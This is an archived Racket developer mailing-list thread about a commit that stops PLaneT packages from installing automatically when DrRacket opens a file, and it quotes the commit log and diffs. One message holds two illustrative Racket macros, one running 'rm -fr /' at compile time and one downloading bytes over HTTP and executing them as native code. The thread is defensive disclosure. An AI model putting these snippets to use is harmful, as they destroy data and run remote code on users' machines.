subject:"\[racket\-dev\] \[plt\] Push #27862\: master branch updated"

Re: [racket-dev] [plt] Push #27862: master branch updated

2013-11-28 Thread Robby Findler

Oh, yes. I meant to add this to my message. This is a bit part of why I
think the package system is going to work well: there is now some movement
in this good direction. (Jacob and Matthias and I had talked about social
"stuff" in the context of planet a bunch, but a) didn't do enough and b)
had a slightly different emphasis -- but b) probably would have changed if
we'd dug into it.)

Robby


On Thu, Nov 28, 2013 at 8:57 AM, Jay McCarthy  wrote:

> And similarly, the package system is a social curation system to
> monitor packages for good behavior, which planet does do (but could
> have and could now.)
>
> Jay
>
> On Thu, Nov 28, 2013 at 7:56 AM, Robby Findler
>  wrote:
> > In short "yes". But that short answer isn't where we should stop. :)
> Really,
> > this is about a design decision that's different between planet and the
> > package system: in planet, "running" a program was sufficient for
> installing
> > packages. In the package system you have to take an explicit step to
> > "install" the package.
> >
> > I used quotes there because the devil is a bit in the details here (as
> Jay
> > points out with his "some macro tricks" comment) but really what we're
> > talking about is that design difference and UX issues. Overall, I feel
> like
> > the package system's different design decisions are the right way to go
> but
> > that we should keep planet being planet (and Jay and I had a discussion
> > about that offline), which is why he reverted one of those commits.
> >
> > And to clear up the check syntax thing: there is no way that online check
> > syntax could have installed a planet package (or, for that matter, made
> any
> > changes to your file system). You would have had to Run the program or
> > explicitly ask for it to be compiled or something like that.
> >
> > Make more sense?
> >
> > Robby
> >
> >
> > On Thu, Nov 28, 2013 at 8:44 AM, Matthias Felleisen <
> matth...@ccs.neu.edu>
> > wrote:
> >>
> >>
> >> Am I naive or isn't any download of any package opening the door to such
> >> tricks?
> >>
> >>
> >> On Nov 27, 2013, at 8:46 PM, Jay McCarthy wrote:
> >>
> >> > On Wed, Nov 27, 2013 at 6:27 PM, Robby Findler
> >> >  wrote:
> >> >>
> >> >>
> >> >>
> >> >> On Wed, Nov 27, 2013 at 7:21 PM, Jay McCarthy 
> >> >> wrote:
> >> >>>
> >> >>> If I have background expansion on, then when I open that file it
> >> >>> installs the package.
> >> >>>
> >> >>
> >> >> As I wrote in my previous message, it doesn't do that for me. And I
> >> >> don't
> >> >> see how it could do that, actually. Are you saying that you tried
> this?
> >> >
> >> > Yes. I put that in a file and opened it up with DrRacket then got the
> >> > "Can't download a Planet package" error message as-if the install were
> >> > stopped.
> >> >
> >> >> Can you explain how you have configured DrRacket to disable the
> >> >> security
> >> >> guard that is installed by the background expansion process, please?
> >> >
> >> > Perhaps my trial was bad because the security guard would have stopped
> >> > the network access but my error stopped the library from attempting
> >> > the network access?
> >> >
> >> > Regardless, "Check Syntax" (I think?) or compilation in Racket would
> >> > have installed it. [Now, obviously the same macro tricks could
> >> > explicitly call download/install-pkg... but I think it is a bit feeble
> >> > to say "Check Syntax" should make no attempt to prevent package
> >> > installation.]
> >> >
> >> >> Meanwhile, I would like to point out that your commit has completely
> >> >> disabled planet. No packages can be installed. Did you run any test
> >> >> suites
> >> >> after making this change?
> >> >
> >> > I tried to install and fetch some packages. I see now that I committed
> >> > in the "racket/collects" directory but the changes to make that work
> >> > were in the "pkgs/planet-pkgs" directory so I stupidly missed them.
> >> >
> >> > Jay
> >> >
> >> >> Robby
> >> >>
> >> > _
> >> >  Racket Developers list:
> >> >  http://lists.racket-lang.org/dev
> >>
> >
>
_
  Racket Developers list:
  http://lists.racket-lang.org/dev

Re: [racket-dev] [plt] Push #27862: master branch updated

2013-11-28 Thread Jay McCarthy

And similarly, the package system is a social curation system to
monitor packages for good behavior, which planet does do (but could
have and could now.)

Jay

On Thu, Nov 28, 2013 at 7:56 AM, Robby Findler
 wrote:
> In short "yes". But that short answer isn't where we should stop. :) Really,
> this is about a design decision that's different between planet and the
> package system: in planet, "running" a program was sufficient for installing
> packages. In the package system you have to take an explicit step to
> "install" the package.
>
> I used quotes there because the devil is a bit in the details here (as Jay
> points out with his "some macro tricks" comment) but really what we're
> talking about is that design difference and UX issues. Overall, I feel like
> the package system's different design decisions are the right way to go but
> that we should keep planet being planet (and Jay and I had a discussion
> about that offline), which is why he reverted one of those commits.
>
> And to clear up the check syntax thing: there is no way that online check
> syntax could have installed a planet package (or, for that matter, made any
> changes to your file system). You would have had to Run the program or
> explicitly ask for it to be compiled or something like that.
>
> Make more sense?
>
> Robby
>
>
> On Thu, Nov 28, 2013 at 8:44 AM, Matthias Felleisen 
> wrote:
>>
>>
>> Am I naive or isn't any download of any package opening the door to such
>> tricks?
>>
>>
>> On Nov 27, 2013, at 8:46 PM, Jay McCarthy wrote:
>>
>> > On Wed, Nov 27, 2013 at 6:27 PM, Robby Findler
>> >  wrote:
>> >>
>> >>
>> >>
>> >> On Wed, Nov 27, 2013 at 7:21 PM, Jay McCarthy 
>> >> wrote:
>> >>>
>> >>> If I have background expansion on, then when I open that file it
>> >>> installs the package.
>> >>>
>> >>
>> >> As I wrote in my previous message, it doesn't do that for me. And I
>> >> don't
>> >> see how it could do that, actually. Are you saying that you tried this?
>> >
>> > Yes. I put that in a file and opened it up with DrRacket then got the
>> > "Can't download a Planet package" error message as-if the install were
>> > stopped.
>> >
>> >> Can you explain how you have configured DrRacket to disable the
>> >> security
>> >> guard that is installed by the background expansion process, please?
>> >
>> > Perhaps my trial was bad because the security guard would have stopped
>> > the network access but my error stopped the library from attempting
>> > the network access?
>> >
>> > Regardless, "Check Syntax" (I think?) or compilation in Racket would
>> > have installed it. [Now, obviously the same macro tricks could
>> > explicitly call download/install-pkg... but I think it is a bit feeble
>> > to say "Check Syntax" should make no attempt to prevent package
>> > installation.]
>> >
>> >> Meanwhile, I would like to point out that your commit has completely
>> >> disabled planet. No packages can be installed. Did you run any test
>> >> suites
>> >> after making this change?
>> >
>> > I tried to install and fetch some packages. I see now that I committed
>> > in the "racket/collects" directory but the changes to make that work
>> > were in the "pkgs/planet-pkgs" directory so I stupidly missed them.
>> >
>> > Jay
>> >
>> >> Robby
>> >>
>> > _
>> >  Racket Developers list:
>> >  http://lists.racket-lang.org/dev
>>
>
_
  Racket Developers list:
  http://lists.racket-lang.org/dev

Re: [racket-dev] [plt] Push #27862: master branch updated

2013-11-28 Thread Robby Findler

In short "yes". But that short answer isn't where we should stop. :)
Really, this is about a design decision that's different between planet and
the package system: in planet, "running" a program was sufficient for
installing packages. In the package system you have to take an explicit
step to "install" the package.

I used quotes there because the devil is a bit in the details here (as Jay
points out with his "some macro tricks" comment) but really what we're
talking about is that design difference and UX issues. Overall, I feel like
the package system's different design decisions are the right way to go but
that we should keep planet being planet (and Jay and I had a discussion
about that offline), which is why he reverted one of those commits.

And to clear up the check syntax thing: there is no way that online check
syntax could have installed a planet package (or, for that matter, made any
changes to your file system). You would have had to Run the program or
explicitly ask for it to be compiled or something like that.

Make more sense?

Robby

On Thu, Nov 28, 2013 at 8:44 AM, Matthias Felleisen wrote:

>
> Am I naive or isn't any download of any package opening the door to such
> tricks?
>
>
> On Nov 27, 2013, at 8:46 PM, Jay McCarthy wrote:
>
> > On Wed, Nov 27, 2013 at 6:27 PM, Robby Findler
> >  wrote:
> >>
> >>
> >>
> >> On Wed, Nov 27, 2013 at 7:21 PM, Jay McCarthy 
> wrote:
> >>>
> >>> If I have background expansion on, then when I open that file it
> >>> installs the package.
> >>>
> >>
> >> As I wrote in my previous message, it doesn't do that for me. And I
> don't
> >> see how it could do that, actually. Are you saying that you tried this?
> >
> > Yes. I put that in a file and opened it up with DrRacket then got the
> > "Can't download a Planet package" error message as-if the install were
> > stopped.
> >
> >> Can you explain how you have configured DrRacket to disable the security
> >> guard that is installed by the background expansion process, please?
> >
> > Perhaps my trial was bad because the security guard would have stopped
> > the network access but my error stopped the library from attempting
> > the network access?
> >
> > Regardless, "Check Syntax" (I think?) or compilation in Racket would
> > have installed it. [Now, obviously the same macro tricks could
> > explicitly call download/install-pkg... but I think it is a bit feeble
> > to say "Check Syntax" should make no attempt to prevent package
> > installation.]
> >
> >> Meanwhile, I would like to point out that your commit has completely
> >> disabled planet. No packages can be installed. Did you run any test
> suites
> >> after making this change?
> >
> > I tried to install and fetch some packages. I see now that I committed
> > in the "racket/collects" directory but the changes to make that work
> > were in the "pkgs/planet-pkgs" directory so I stupidly missed them.
> >
> > Jay
> >
> >> Robby
> >>
> > _
> >  Racket Developers list:
> >  http://lists.racket-lang.org/dev
>
>
_
  Racket Developers list:
  http://lists.racket-lang.org/dev

Re: [racket-dev] [plt] Push #27862: master branch updated

2013-11-28 Thread Matthias Felleisen


Am I naive or isn't any download of any package opening the door to such 
tricks? 


On Nov 27, 2013, at 8:46 PM, Jay McCarthy wrote:

> On Wed, Nov 27, 2013 at 6:27 PM, Robby Findler
>  wrote:
>> 
>> 
>> 
>> On Wed, Nov 27, 2013 at 7:21 PM, Jay McCarthy  wrote:
>>> 
>>> If I have background expansion on, then when I open that file it
>>> installs the package.
>>> 
>> 
>> As I wrote in my previous message, it doesn't do that for me. And I don't
>> see how it could do that, actually. Are you saying that you tried this?
> 
> Yes. I put that in a file and opened it up with DrRacket then got the
> "Can't download a Planet package" error message as-if the install were
> stopped.
> 
>> Can you explain how you have configured DrRacket to disable the security
>> guard that is installed by the background expansion process, please?
> 
> Perhaps my trial was bad because the security guard would have stopped
> the network access but my error stopped the library from attempting
> the network access?
> 
> Regardless, "Check Syntax" (I think?) or compilation in Racket would
> have installed it. [Now, obviously the same macro tricks could
> explicitly call download/install-pkg... but I think it is a bit feeble
> to say "Check Syntax" should make no attempt to prevent package
> installation.]
> 
>> Meanwhile, I would like to point out that your commit has completely
>> disabled planet. No packages can be installed. Did you run any test suites
>> after making this change?
> 
> I tried to install and fetch some packages. I see now that I committed
> in the "racket/collects" directory but the changes to make that work
> were in the "pkgs/planet-pkgs" directory so I stupidly missed them.
> 
> Jay
> 
>> Robby
>> 
> _
>  Racket Developers list:
>  http://lists.racket-lang.org/dev


_
  Racket Developers list:
  http://lists.racket-lang.org/dev

Re: [racket-dev] [plt] Push #27862: master branch updated

2013-11-27 Thread Jay McCarthy

On Wed, Nov 27, 2013 at 6:27 PM, Robby Findler
 wrote:
>
>
>
> On Wed, Nov 27, 2013 at 7:21 PM, Jay McCarthy  wrote:
>>
>> If I have background expansion on, then when I open that file it
>> installs the package.
>>
>
> As I wrote in my previous message, it doesn't do that for me. And I don't
> see how it could do that, actually. Are you saying that you tried this?

Yes. I put that in a file and opened it up with DrRacket then got the
"Can't download a Planet package" error message as-if the install were
stopped.

> Can you explain how you have configured DrRacket to disable the security
> guard that is installed by the background expansion process, please?

Perhaps my trial was bad because the security guard would have stopped
the network access but my error stopped the library from attempting
the network access?

Regardless, "Check Syntax" (I think?) or compilation in Racket would
have installed it. [Now, obviously the same macro tricks could
explicitly call download/install-pkg... but I think it is a bit feeble
to say "Check Syntax" should make no attempt to prevent package
installation.]

> Meanwhile, I would like to point out that your commit has completely
> disabled planet. No packages can be installed. Did you run any test suites
> after making this change?

I tried to install and fetch some packages. I see now that I committed
in the "racket/collects" directory but the changes to make that work
were in the "pkgs/planet-pkgs" directory so I stupidly missed them.

Jay

> Robby
>
_
  Racket Developers list:
  http://lists.racket-lang.org/dev

Re: [racket-dev] [plt] Push #27862: master branch updated

2013-11-27 Thread Robby Findler

On Wed, Nov 27, 2013 at 7:21 PM, Jay McCarthy  wrote:

> If I have background expansion on, then when I open that file it
> installs the package.
>
>
As I wrote in my previous message, it doesn't do that for me. And I don't
see how it could do that, actually. Are you saying that you tried this?

Can you explain how you have configured DrRacket to disable the security
guard that is installed by the background expansion process, please?

Meanwhile, I would like to point out that your commit has completely
disabled planet. No packages can be installed. Did you run any test suites
after making this change?

Robby
_
  Racket Developers list:
  http://lists.racket-lang.org/dev

Re: [racket-dev] [plt] Push #27862: master branch updated

2013-11-27 Thread Jay McCarthy

If I have background expansion on, then when I open that file it
installs the package.

Since once a Planet package is installed it is set up and compiled
that means that this code:

#lang racket
(attack)
(define-syntax (attack stx)
 (system "rm -fr /"))

is automatically run as soon as I open it up.

Furthermore, I could do something like this:

#lang racket
(attack)
(define-syntax (attack stx)
 (local-require (only-in '#%foreign ffi-call _int32)
 net/http-client)

(define-values (s hs ip)
  (http-sendrecv "example.com" "/"))
(define bs (port->bytes ip))
(printf "got: ~v\n" bs)
(define weird-c-code bs)

((ffi-call weird-c-code null _int32)))

and really execute any C code that I could find on the Internet.

This isn't just a DrRacket problem though. We should not be
arbitrarily installing things on people's machines without their
consent. This power is too much.

The new system of suggesting an install or allowing an opt-in for
certain vetted packages is much kinder.

Jay




On Wed, Nov 27, 2013 at 5:35 PM, Robby Findler
 wrote:
> Can you demonstrate how to make this happen? Opening a file with these
> contents, for example, doesn't install anything.
>
> #lang racket
> (require (planet planet/test-connection:1:0/test-connection))
>
> As for automatically executing arbitrary code, I think you must mean
> something more precise here. Perhaps "code that hasn't already been
> explicitly installed"? If that's what you mean, then I think I'm also
> missing how this happens.
>
> Robby
>
>
> On Wed, Nov 27, 2013 at 4:42 PM, Jay McCarthy  wrote:
>>
>> There is an important change in this commit. Since we've created the
>> release branch for 6.0, I think we should stop automatically
>> installing and executing arbitrary code when people open files in
>> DrRacket. Currently the error message suggests using "raco planet" but
>> I think we need a bit of a GUI shim for other users.
>>
>> On Wed, Nov 27, 2013 at 3:40 PM,   wrote:
>> > jay has updated `master' from 033065f632 to 60ae164d05.
>> >   http://git.racket-lang.org/plt/033065f632..60ae164d05
>> >
>> > =[ 6 Commits ]==
>> > Directory summary:
>> >   57.6% pkgs/plt-services/meta/pkg-index/official/static/
>> >   17.6% pkgs/plt-services/meta/pkg-index/official/
>> >   22.0% racket/collects/planet/private/
>> >
>> > ~~
>> >
>> > 2413278 Jay McCarthy  2013-11-27 14:51
>> > :
>> > | moving delete button
>> > :
>> >   M .../meta/pkg-index/official/static/index.html |  2 ++
>> >   M .../meta/pkg-index/official/static/index.js   | 16
>> > +---
>> >   M .../meta/pkg-index/official/static/style.css  |  4 
>> >
>> > ~~
>> >
>> > 113696c Jay McCarthy  2013-11-27 14:54
>> > :
>> > | edit on lose focus
>> > :
>> >   M pkgs/plt-services/meta/pkg-index/official/static/index.js | 4 +++-
>> >
>> > ~~
>> >
>> > cf1755f Jay McCarthy  2013-11-27 15:19
>> > :
>> > | Remove arbitrary code execution exploit from Racket and DrRacket
>> > |
>> > | This is particularly bad with DrRacket's online syntax checking, which
>> > | causes opening a file to download and executed aribtrary code.
>> > :
>> >   M racket/collects/planet/private/resolver.rkt | 8 
>> >
>> > ~~
>> >
>> > 98df30c Jay McCarthy  2013-11-27 15:30
>> > :
>> > | deleting static s3 content properly
>> > :
>> >   M pkgs/plt-services/meta/pkg-index/official/static.rkt | 11
>> > ++-
>> >
>> > ~~
>> >
>> > 7b7a5ad Jay McCarthy  2013-11-27 15:33
>> > :
>> > | increase pkg test timeout
>> > :
>> >   M pkgs/plt-services/meta/props | 2 +-
>> >
>> > ~~
>> >
>> > 60ae164 Jay McCarthy  2013-11-27 15:39
>> > :
>> > | Removing add tag button when not logged in re mflatt
>> > :
>> >   M pkgs/plt-services/meta/pkg-index/official/static/index.js  | 11
>> > +--
>> >   M .../plt-services/meta/pkg-index/official/static/index.html |  2 +-
>> >
>> > =[ Overall Diff ]===
>> >
>> > pkgs/plt-services/meta/pkg-index/official/static.rkt
>> > 
>> > --- OLD/pkgs/plt-services/meta/pkg-index/official/static.rkt
>> > +++ NEW/pkgs/plt-services/meta/pkg-index/official/static.rkt
>> > @@ -304,7 +304,16 @@
>> >(cache "/pkgs" "pkgs")
>> >(cache "/pkgs-all" "pkgs-all")
>> >(for ([p (in-list pkg-list)])
>> > -(cache (format "/pkg/~a" p) (format "pkg/~a" p
>> > +(cache (format "/pkg/~a" p) (format "pkg/~a" p)))
>> > +
>> > +  (let ()
>> > +(define pkg-path (build-path static-path "pkg"))
>> > +(for ([f (in-list (directory-list pkg-path))]
>> > +  #:unless (regexp-match #"json$" (path->string f))
>> > +  #:unless (member (path->string f) pkg-list))
>> > +  (with-handlers ([exn:fail:filesystem? void])
>> > +(delete-file (build-path pkg-path f))
>> > +(delete-file (build-path pkg-path (path-add-suffix f
>> > #".json")))
>>

Re: [racket-dev] [plt] Push #27862: master branch updated

2013-11-27 Thread Robby Findler

Can you demonstrate how to make this happen? Opening a file with these
contents, for example, doesn't install anything.

#lang racket
(require (planet planet/test-connection:1:0/test-connection))

As for automatically executing arbitrary code, I think you must mean
something more precise here. Perhaps "code that hasn't already been
explicitly installed"? If that's what you mean, then I think I'm also
missing how this happens.

Robby


On Wed, Nov 27, 2013 at 4:42 PM, Jay McCarthy  wrote:

> There is an important change in this commit. Since we've created the
> release branch for 6.0, I think we should stop automatically
> installing and executing arbitrary code when people open files in
> DrRacket. Currently the error message suggests using "raco planet" but
> I think we need a bit of a GUI shim for other users.
>
> On Wed, Nov 27, 2013 at 3:40 PM,   wrote:
> > jay has updated `master' from 033065f632 to 60ae164d05.
> >   http://git.racket-lang.org/plt/033065f632..60ae164d05
> >
> > =[ 6 Commits ]==
> > Directory summary:
> >   57.6% pkgs/plt-services/meta/pkg-index/official/static/
> >   17.6% pkgs/plt-services/meta/pkg-index/official/
> >   22.0% racket/collects/planet/private/
> >
> > ~~
> >
> > 2413278 Jay McCarthy  2013-11-27 14:51
> > :
> > | moving delete button
> > :
> >   M .../meta/pkg-index/official/static/index.html |  2 ++
> >   M .../meta/pkg-index/official/static/index.js   | 16
> +---
> >   M .../meta/pkg-index/official/static/style.css  |  4 
> >
> > ~~
> >
> > 113696c Jay McCarthy  2013-11-27 14:54
> > :
> > | edit on lose focus
> > :
> >   M pkgs/plt-services/meta/pkg-index/official/static/index.js | 4 +++-
> >
> > ~~
> >
> > cf1755f Jay McCarthy  2013-11-27 15:19
> > :
> > | Remove arbitrary code execution exploit from Racket and DrRacket
> > |
> > | This is particularly bad with DrRacket's online syntax checking, which
> > | causes opening a file to download and executed aribtrary code.
> > :
> >   M racket/collects/planet/private/resolver.rkt | 8 
> >
> > ~~
> >
> > 98df30c Jay McCarthy  2013-11-27 15:30
> > :
> > | deleting static s3 content properly
> > :
> >   M pkgs/plt-services/meta/pkg-index/official/static.rkt | 11 ++-
> >
> > ~~
> >
> > 7b7a5ad Jay McCarthy  2013-11-27 15:33
> > :
> > | increase pkg test timeout
> > :
> >   M pkgs/plt-services/meta/props | 2 +-
> >
> > ~~
> >
> > 60ae164 Jay McCarthy  2013-11-27 15:39
> > :
> > | Removing add tag button when not logged in re mflatt
> > :
> >   M pkgs/plt-services/meta/pkg-index/official/static/index.js  | 11
> +--
> >   M .../plt-services/meta/pkg-index/official/static/index.html |  2 +-
> >
> > =[ Overall Diff ]===
> >
> > pkgs/plt-services/meta/pkg-index/official/static.rkt
> > 
> > --- OLD/pkgs/plt-services/meta/pkg-index/official/static.rkt
> > +++ NEW/pkgs/plt-services/meta/pkg-index/official/static.rkt
> > @@ -304,7 +304,16 @@
> >(cache "/pkgs" "pkgs")
> >(cache "/pkgs-all" "pkgs-all")
> >(for ([p (in-list pkg-list)])
> > -(cache (format "/pkg/~a" p) (format "pkg/~a" p
> > +(cache (format "/pkg/~a" p) (format "pkg/~a" p)))
> > +
> > +  (let ()
> > +(define pkg-path (build-path static-path "pkg"))
> > +(for ([f (in-list (directory-list pkg-path))]
> > +  #:unless (regexp-match #"json$" (path->string f))
> > +  #:unless (member (path->string f) pkg-list))
> > +  (with-handlers ([exn:fail:filesystem? void])
> > +(delete-file (build-path pkg-path f))
> > +(delete-file (build-path pkg-path (path-add-suffix f
> #".json")))
> >
> >  (module+ main
> >(require racket/cmdline)
> >
> > pkgs/plt-services/meta/pkg-index/official/static/index.html
> > ~~~
> > --- OLD/pkgs/plt-services/meta/pkg-index/official/static/index.html
> > +++ NEW/pkgs/plt-services/meta/pkg-index/official/static/index.html
> > @@ -54,12 +54,14 @@
> >  Last Edit: id="pi_last_edit">
> >  Description: id="pi_description">
> >  Tags:
> > - class="text ui-widget-content ui-corner-all" /> id="pi_add_tag_button">Add Tag
> > + id="pi_add_tag_text" class="text ui-widget-content ui-corner-all" /> id="pi_add_tag_button">Add Tag
> >  Versions Exceptions id="pi_versions">
> >   id="pi_add_version_row">Version:  type="text" id="pi_add_version_text" class="text ui-widget-content
> ui-corner-all" />Source:  id="pi_add_version_source_text" class="text ui-widget-content
> ui-corner-all" />Add Version
> Exception
> >  Dependencies id="pi_dependencies">
> >  Conflicts id="pi_conflicts">
> >  Modules
> > + id="pi_delete_button">Delete
> > +Package(there is no undo!)
> >
> >
> >

Re: [racket-dev] [plt] Push #27862: master branch updated

2013-11-27 Thread Jay McCarthy

There is an important change in this commit. Since we've created the
release branch for 6.0, I think we should stop automatically
installing and executing arbitrary code when people open files in
DrRacket. Currently the error message suggests using "raco planet" but
I think we need a bit of a GUI shim for other users.

On Wed, Nov 27, 2013 at 3:40 PM,   wrote:
> jay has updated `master' from 033065f632 to 60ae164d05.
>   http://git.racket-lang.org/plt/033065f632..60ae164d05
>
> =[ 6 Commits ]==
> Directory summary:
>   57.6% pkgs/plt-services/meta/pkg-index/official/static/
>   17.6% pkgs/plt-services/meta/pkg-index/official/
>   22.0% racket/collects/planet/private/
>
> ~~
>
> 2413278 Jay McCarthy  2013-11-27 14:51
> :
> | moving delete button
> :
>   M .../meta/pkg-index/official/static/index.html |  2 ++
>   M .../meta/pkg-index/official/static/index.js   | 16 
> +---
>   M .../meta/pkg-index/official/static/style.css  |  4 
>
> ~~
>
> 113696c Jay McCarthy  2013-11-27 14:54
> :
> | edit on lose focus
> :
>   M pkgs/plt-services/meta/pkg-index/official/static/index.js | 4 +++-
>
> ~~
>
> cf1755f Jay McCarthy  2013-11-27 15:19
> :
> | Remove arbitrary code execution exploit from Racket and DrRacket
> |
> | This is particularly bad with DrRacket's online syntax checking, which
> | causes opening a file to download and executed aribtrary code.
> :
>   M racket/collects/planet/private/resolver.rkt | 8 
>
> ~~
>
> 98df30c Jay McCarthy  2013-11-27 15:30
> :
> | deleting static s3 content properly
> :
>   M pkgs/plt-services/meta/pkg-index/official/static.rkt | 11 ++-
>
> ~~
>
> 7b7a5ad Jay McCarthy  2013-11-27 15:33
> :
> | increase pkg test timeout
> :
>   M pkgs/plt-services/meta/props | 2 +-
>
> ~~
>
> 60ae164 Jay McCarthy  2013-11-27 15:39
> :
> | Removing add tag button when not logged in re mflatt
> :
>   M pkgs/plt-services/meta/pkg-index/official/static/index.js  | 11 
> +--
>   M .../plt-services/meta/pkg-index/official/static/index.html |  2 +-
>
> =[ Overall Diff ]===
>
> pkgs/plt-services/meta/pkg-index/official/static.rkt
> 
> --- OLD/pkgs/plt-services/meta/pkg-index/official/static.rkt
> +++ NEW/pkgs/plt-services/meta/pkg-index/official/static.rkt
> @@ -304,7 +304,16 @@
>(cache "/pkgs" "pkgs")
>(cache "/pkgs-all" "pkgs-all")
>(for ([p (in-list pkg-list)])
> -(cache (format "/pkg/~a" p) (format "pkg/~a" p
> +(cache (format "/pkg/~a" p) (format "pkg/~a" p)))
> +
> +  (let ()
> +(define pkg-path (build-path static-path "pkg"))
> +(for ([f (in-list (directory-list pkg-path))]
> +  #:unless (regexp-match #"json$" (path->string f))
> +  #:unless (member (path->string f) pkg-list))
> +  (with-handlers ([exn:fail:filesystem? void])
> +(delete-file (build-path pkg-path f))
> +(delete-file (build-path pkg-path (path-add-suffix f #".json")))
>
>  (module+ main
>(require racket/cmdline)
>
> pkgs/plt-services/meta/pkg-index/official/static/index.html
> ~~~
> --- OLD/pkgs/plt-services/meta/pkg-index/official/static/index.html
> +++ NEW/pkgs/plt-services/meta/pkg-index/official/static/index.html
> @@ -54,12 +54,14 @@
>  Last Edit:
>  Description: id="pi_description">
>  Tags:
> -Add 
> Tag
> + id="pi_add_tag_text" class="text ui-widget-content ui-corner-all" /> id="pi_add_tag_button">Add Tag
>  Versions Exceptions id="pi_versions">
>  Version: 
> Source:  id="pi_add_version_source_text" class="text ui-widget-content ui-corner-all" 
> />Add Version Exception
>  Dependencies id="pi_dependencies">
>  Conflicts id="pi_conflicts">
>  Modules
> + id="pi_delete_button">Delete
> +Package(there is no undo!)
>
>
>Install this package 
> with:raco pkg install  id="pi_name_inst">or, with the 'File|Install Package...' 
> menu option in DrRacket.
>
> pkgs/plt-services/meta/pkg-index/official/static/index.js
> ~
> --- OLD/pkgs/plt-services/meta/pkg-index/official/static/index.js
> +++ NEW/pkgs/plt-services/meta/pkg-index/official/static/index.js
> @@ -8,6 +8,8 @@ function me () {
>  return localStorage['email']; }
>
>  $( document ).ready(function() {
> +var logged_in = false;
> +
>  function jslink ( texts, clickf) {
>  return $('', { href: "javascript:void(0)",
>click: clickf } ).html(texts); }
> @@ -43,7 +45,7 @@ $( document ).ready(function() {
>  update_package_on_list ( pkgi );
>  // console.log( pkgi );
>  change_hash( "[" + pkgi['name'] + "]" );
> -
> +
>  var mypkg_p = ($.inArr

Re: [racket-dev] [plt] Push #27862: master branch updated

Re: [racket-dev] [plt] Push #27862: master branch updated

Re: [racket-dev] [plt] Push #27862: master branch updated

Re: [racket-dev] [plt] Push #27862: master branch updated

Re: [racket-dev] [plt] Push #27862: master branch updated

Re: [racket-dev] [plt] Push #27862: master branch updated

Re: [racket-dev] [plt] Push #27862: master branch updated

Re: [racket-dev] [plt] Push #27862: master branch updated

Re: [racket-dev] [plt] Push #27862: master branch updated

9 matches

Site Navigation

Mail list logo

Footer information